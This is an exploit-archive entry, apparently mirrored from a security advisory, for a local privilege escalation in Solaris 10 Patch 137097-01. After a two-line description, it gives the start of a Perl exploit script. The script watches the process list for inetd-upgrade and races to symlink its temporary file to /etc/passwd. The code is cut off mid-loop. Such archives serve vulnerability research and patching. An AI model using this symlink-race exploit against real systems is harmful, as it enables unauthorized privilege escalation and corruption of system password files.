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# Title : Solaris 10 Patch 137097-01 Symlink Attack Privilege Escalation
# Published : 2012-08-11
# Author :
# Previous Title : FileBound 6.2 Privilege Escalation Vulnerability
# Next Title : Aloaha Credential Provider Monitor 5.0.226 Local Privilege Escalation Vulnerability

Source: http://www.securityfocus.com/bid/54919/info

Solaris 10 Patch 137097-01 is prone to a local privilege-escalation vulnerability. 

Local attackers can exploit this issue to gain elevated privileges on affected computers.

$clobber = "/etc/passwd";
while(1) {
open ps,"ps -ef | grep -v grep |grep -v PID |";

while(<ps>) {
@args = split " ", $_;

if (/inetd-upgrade/) { 
        print "Symlinking iconf_entries.$args[1] to  $clobbern";
